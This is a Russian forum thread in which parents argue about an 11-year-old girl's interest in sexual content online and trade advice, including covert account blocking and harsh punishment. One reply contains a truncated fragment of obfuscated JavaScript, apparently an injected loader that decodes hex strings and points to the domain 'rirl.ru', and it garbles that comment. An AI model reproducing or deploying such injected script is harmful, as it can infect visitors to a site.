Может быть я и ошибаюсь. Но все выкрутасы в детском возрасте, такие как воровство, курение, а в нашей истории интерес к взрослой половой жизни, ни что иное, как от недостатка внимания, любви к ребенку и внутри семьи. Нет общения между родителями, между родителями и ребенком. Вроде одет и обут, есть дорогие вещи. Но вместо общения с родителями, подглядывают за чужой жизнью. Я вспоминаю свое детство, когда не было интернета, а беременность школьницы в 16 лет вызывала ужас. Хотя и тогда было и порно, и маньяки, но дети были очень далеки от этого. Я по своей натуре паникёрша. я бы, наверно, с ума сошла, что дитё на такое глазеет и заводит сомнительные знакомства. Маме надо срочно предпринимать какие то меры..... уж простите, даже не знаю как бы я поступила.... (, как говорится да не дай Бог)

Ответить
Поддерживаю Да3 / Нет0
LOVEDOG
16856 LOVEDOG
LOVEDOG offline
Репутация : 110546
Комментариев 1856 16
05 января 23:19:32
2016-01-05 23:19:32
Я однажды, по случайности залезла в группу в ВК, и была в полном аутетам маленькие девочки, возрастом 12-16 лет выставляли свои фото в нижнем белье, но комменты ещё больше убивали, как особи (мужчины) лет 22-37 пишут "я тебя хочу" или "мм сладкая девочка". Что с этим миром не так?
Ответить
Поддерживаю Да3 / Нет0
Чем безупречнее человек кажется снаружи, тем больше демонов у него внутри. © Зигмунд Фрейд
Вика
Вика

06 января 02:53:50
2016-01-06 02:53:50
В браузере есть функция родительский контроль, потом куча софта чтобы оградить детей от всякой фигни!!!Но вот соц. сети ограничить очень сложно, поэтому придется быть бдительными тем более если это девочки так как они раньше созревают в отличии от мальчишек!!!
Ответить
Поддерживаю Да1 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
06 января 10:17:59
2016-01-06 10:17:59

Гость, Гость, Моя подруга нормальная девушка и мать. Она не выставляет свои эрофото (вот уж делать ей больше нечего), не обсуждает при ребенке свою сексуальную жизнь, нормально одевается, обычно и совсем не развратно. Не делает из темы секса запретного культа. Она поговорила с дочкой на тему месячных и каких-то физиологических процессов в организме мужчины и женщины. В этой семье не пьют, не матерятся, при ребенке не обсуждают неприличные темы.

Папа дочки умер, но она с ним и не общалась с рождения. У нее есть отчим и у них прекрасные отношения. С отчимом, с его родителями, с его сыном. Девочка очень любит мужа подруги, а он ее воспитывает абсолютно так же, как и своего сына. В этом плане все просто отлично. Там не делят детей на твоих и моих, все всех любят и вообще, там нормальная семья. Не без проблем, как и все, но ребенок со своей позиции живет в идеальной семье.

>
Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
06 января 10:32:33
2016-01-06 10:32:33

Осенняя, Я выше писала, все нормально у них в семье. Моя подруга хорошая мама. Ей не наплевать на ребенка. Да, она много работает, но всегда находит время на дочку, на то, чтобы сходить на выступление ее или пошить костюмы к выступлению. И от недостатка любви она не страдает. У нее есть родители и было даже три пары бабушек-дедушек. И все ее любят и всем есть дело то того, чем она занимается, увлекается и что у нее в жизни происходит.

Так что как кто-то выразился эта "маман" разводит "соплежуйство" не потому, что ей безразлична эта ситуация, а потому, что она считает, что поступает правильно. И она думает, что так лучше. Права она или нет, с этим можно поспорить, но тут никто точно и не может сказать: права она или нет. Но одно могу сказать точно: предположения, что у дочки эти наклонности из-за того, что ее не любят, ею не интересуются, или она живет с развратной мамашей - беспочвенны. Вика - хорошая мама.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

06 января 11:24:04
2016-01-06 11:24:04
Сиреневая Кошка, Ну явно какая-то проблема в семье существует. Если бы девочки было бы 13-15 лет еще можно было бы сослаться на пубертатный период. В 11 же лет ребенок в основном еще копирует поведение старших, старается казаться взрослее чем есть. Или не достаточно следят, все таки, близкие за собой. Только не понятно от куда вы точно можете утверждать какие отношения в семье, если это не ваша семья. Или же, все таки, от кого-то присутствует пагубное влияние. Кого-то кто является примером для ребенка. В идеальной семье мать не игнорирует такое поведение ребенка, она не боится поговорить с ребенком и объяснить опасность такого поведения. Для этого не надо ребенка стыдить или наказывать, что бы он понял. Мать в данной семье не выполняет роль контроля и воспитание. То, что она странички просматривает, с таким успехом она может просматривать странички чужого ребенка. Как вариант возможно комментарий выше верный, что девочки не оказывают должного внимания и любви. Причины такого поведения всегда вылезают из семьи. Их надо искать, иначе помочь ребенку не будет возможности. Не станет ребенок просто так из хорошей семье, иметь интересы как из неблагополучной. Вы поймите, это уже не просто просмотр гениталий и порно, это уже когда-то конкретно растлили ребенка.
Ответить
Поддерживаю Да0 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
06 января 11:24:17
2016-01-06 11:24:17

прокурор, Она занималась раньше и бассейном, и вокалом, и танцами, и гимнастикой. Была настолько занята, что Вика стала переживать, чтобы это не пошло в ущерб ее здоровью и учебе. Все-таки ребенок должен иногда отдыхать и просто играть. Поэтому дочке предложили выбирать, она выбрала танцы, сейчас занимается хип-хопом, достаточно серьезно, тренировки по-моему 3 раза в неделю, выступления часто, поездки какие-то, костюмы... Ей нравится очень. Так что эти проблемы точно не от того, что она праздно болтается или растет как сорняк.

Спасибо вам за ваше мнение.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

06 января 11:24:24
2016-01-06 11:24:24
Сиреневая Кошка, Если она такая хорошая мама, то почему ребенок в 11 лет не знает про опасность потенциальных маньяков и других негодяев?
Ответить
Поддерживаю Да0 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
06 января 11:34:38
2016-01-06 11:34:38
Гость, Я не знаю почему. Если бы знала, я бы не спрашивала. Думаю, причин может быть очень много. Но не потому, что моя подруга плохая мама.
Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
06 января 11:40:01
2016-01-06 11:40:01

Гость, Не станет ребенок просто так из хорошей семье, иметь интересы как из неблагополучной. Вы очень наивны.

Об остальном я сказала. Она не игнорирует своего ребенка, у них в семье нет разврата и ребенок не растет как сорняк, им занимаются. Доказывать вам что-то я не вижу смысла. Я знаю, что это так. Я надеялась, что кто-то даст совет, чем можно помочь в такой ситуации, а не начнет, не зная человека, обвинять ее черте в чем.

Спасибо за совет Блондиночка . Это действительно то, что можно сделать, и это может сработать.

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость
Гость

06 января 12:39:22
2016-01-06 12:39:22
Гость, При чем тут вообще мать ребенка?Зачем вы так грубо?Вот меня бесят такие умники как вы. В истории я не увидела что бы мать не занималась ребенком. И то что она работает и не может уделить время ребенку это не ее вина. Для того она и работает что бы ее ребенок рос в достатке. Что бы ни в чем не нуждался. А девочка дурью мается, видно скучно ей. Вот она и нашла способ развлекаться. Пока мама пашет)))Вот только найдет она на свою маленькую ж***у приключений если вовремя не остановится. А то что мать не хочет с ней поговорить насчет этого, то она права. Может ребенок правда потом замкнется в себе, и вообще все будет делать втихаря. Тут хоть можно ее контролировать втихаря. А то потом она вообще контроль потеряет над дочкой. И странно 11 лет, было бы ей 15 16 лет я бы как то поняла. А тут пипец 11 лет, еще ребенок и интересуется таким. Офигеть можно. Интернет полезная вещь, но и погубная. А социальные сети это вообще полный пипец. Вконтакте, Одноклассники, Фейсбук, Твит, И так далее.. Откуда знаешь кто там за монитором сидит. Может быть извращенец какой то. И я вот не понимаю зачем выставлять свои это фото, им что приятно что какой то больной извращенец др***т над ихними фото. Или зачем спрашивать подробности про секс, вот зачем это я не понимаю просто. Жаль маму девочки, представляю как ей тяжело сейчас. Она не знает как к ней найти подход. Автор я даже не знаю что вам посоветовать. Не дай Бог с такой проблемой столкнуться. А вы умники кто осуждает маму девочки не зарекайтесь, и не осуждайте человека которого не знаете. Бумеранг может и к вам вернутся и потом не говорите А за что мне такое?На этом у меня все.
Ответить
Поддерживаю Да1 / Нет0
прокурор
19659 прокурор
Прокурор offline
Репутация : 29168
Комментариев 230 1
06 января 13:50:22
2016-01-06 13:50:22

Сиреневая Кошка, теперь понимаю.

Еще может помочь другой метод. Это когда семья дает ребенку внимание и заботу. Совместные поездки на природу, в какие-то интересные места. Совместные прогулки. Это тоже имеет все шансы помочь.

Ответить
Поддерживаю Да1 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
06 января 16:23:32
2016-01-06 16:23:32

А как на счет семей подруг девочки?Или ее одноклассников?Ведь окружение и то что в нем говорят имеет значение.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
06 января 16:24:53
2016-01-06 16:24:53

А мама. Мама тут не при чем. Если бы ей было наплевать то она бы совсем не интересовалась жизнью дочки.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249460
Комментариев 2465 8
06 января 20:44:35
2016-01-06 20:44:35

Пусть Ваша подруга как бы не взначай посмотрит вместе с дочкой фильм " Доверие", он интересный и девочка сделает выводы 100%.

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
кинокефал трисмегист
18156 кинокефал трисмегист
кинокефал трисмегист offline
Репутация : 10847
Комментариев 751 23
06 января 20:58:35
2016-01-06 20:58:35

Странная_Такая , а может лучше посмотреть фильм маленькая вера или фильм авария дочь мента мне кажетца ети фильми ето самий раз, да точно посмотрите етих 2 фильма ети фильми будут поучительними

Ответить
Поддерживаю Да0 / Нет0
Ксения
Ксения

09 января 21:02:32
2016-01-09 21:02:32
История, конечно, из ряда вон, но я тоже в 11 смотрела порно, ну и, как мне кажется, выросла нормальным человеком :-D на самотек пускать, разумеется, нельзя, как и нельзя исключать того, что это пройдет через пару месяцев само собой. Думаю, стоит наругать девочку, но следующим образом. Нужно разыграть так, будто мама случайно узнала или застукала девочку и тут же выговор. Если ребенок узнает, что мама тайно лазила по ее страницам, она действительно замкнется и не сможет доверять.
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

09 января 21:56:57
2016-01-09 21:56:57
Не всегда проблема зарождается в семье. Моя дочка(отличница и умница, гордость класса)как-то в миг чуть не стала двоечницей. А дело было так:Как-то позвонила мне классный руководитель и сказала что у дочери проблемы с учебой. У нее никогда не было проблем с учебой. Учителя забили тревогу. За 3 недели с 5 скатилась на 2. Ни беседа ни ремень ничего не помогало. Пока не нашли причину. Причина в новой подружке. Когда причина устранилась и проблема решилась. Разница между историями в том, что мы вовремя (слава Богу и низкий поклон учителю)выявили и решили проблему. В вышеописаной истории если бы не случай возможно мама бы и не узнала вообще чем интересуется дочь. Возможно нужно внимательней посмотреть на окружение дочери и избавить ее от пагубно влияющих на нее людей(подруг).
Ответить
Поддерживаю Да2 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
10 января 05:45:28
2016-01-10 05:45:28

Гость, Тоже думаю что может и подруга тут сыграла роль раз они вместе занимаются таким.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 173945
Комментариев 5950 9
11 января 22:27:41
2016-01-11 22:27:41

Мать девочки во всем виновата!!!!Надо было лучше следить за ней, загрузить кружками, учебой а не допускать такого, потому что подростки страдают херней от большого количества свободного времени!!А теперь я бы посадила под домашний арест, отобрала компьютер, вырубила интернет, отругала и контролировала жестко!!!Такое нельзя спускать на тормозах, втолкуйте подруге что дальше может только быть хуже ранние половые связи залет и сломанная жизнь

Ответить
Поддерживаю Да3 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
12 января 08:53:11
2016-01-12 08:53:11

ксюня-звезда , У тебя дочь растет, по-моему? Надеюсь ты ни в чем не будешь виновата.

Ответить
Поддерживаю Да1 / Нет2
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
мурКа***
15631 мурКа***
мурКа*** offline
Репутация : 89146
Комментариев 1238 24
14 января 00:23:47
2016-01-14 00:23:47
Ответить
Поддерживаю Да0 / Нет0
Чему бы "грабли" не учили, а сердце верит в чудеса!!!
мурКа***
15631 мурКа***
мурКа*** offline
Репутация : 89146
Комментариев 1238 24
14 января 00:55:43
2016-01-14 00:55:43

Обалдеть, я столько писала, а комментарий пуст...

Что хотела я сказать... У самой растёт дочь, что бы сделала в такой ситуации не знаю, но думаю, если она так боится ранить психику дочери, то можно начать с малого. При дочке проболтаться: блиин, надоели эти рекламы с голыми бабами, надо придумать как их устранить... И на следующий день поставить этот самый родительский контроль. Чтоб и на телефоне запрет был. Потом побороться с соц. сетями, это по труднее будет.

А так, реально, в наше время такие дети разнеженные растут, слова не скажи уже психика ломается... Да если бы моя мама меня так застукала, то задница бы у меня горела, местами лысой бы стала, а комп и прочие выходы в инет валялись бы на свалке разбитыми. Моя бы сказала: лучше разбитая психика, но живая и не извращенка.

Ответить
Поддерживаю Да1 / Нет0
Чему бы "грабли" не учили, а сердце верит в чудеса!!!
русалочка
9973 русалочка
Русалочка offline
Репутация : 296888
Комментариев 4963 38
14 января 18:31:02
2016-01-14 18:31:02

Я вам советую вот что: раз разговаривать она боится, а знает все пароли- пусть заходит и просто БЛОКИРУЕТ И УДАЛЯЕТ страничку. Дочка может не догадаться, подумает что ее модераторы забанили. Несколько раз так сделать, и ей лень уже будет заходить. можно заодно и имеил ее заблокировать, поставить как спамерский. а без имеила никуда не войдешь))).

Ответить
Поддерживаю Да1 / Нет0
фрау Зюс
фрау Зюс

26 января 15:25:56
2016-01-26 15:25:56
надо ей обьяснить все минусы такого поведения и все плюсы чистоты и целомудрия. она теряет свое детство и вообще чистоту своей души, занимаясь такими вещами. я прошла через это. онанизм с 7 (!!!) лет. порно с 14. избавилась от этого в 19 лет, уверовав в Господа. Счастлива что это теперь мной не владеет. меня даже воротит от рекламы белья из секс шопа на улице, хотя там все одеты (в это самое белье).
Ответить
Поддерживаю Да1 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249460
Комментариев 2465 8
27 января 13:25:02
2016-01-27 13:25:02

Сёстры Иеговы с нами))))фрау Зюс,

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке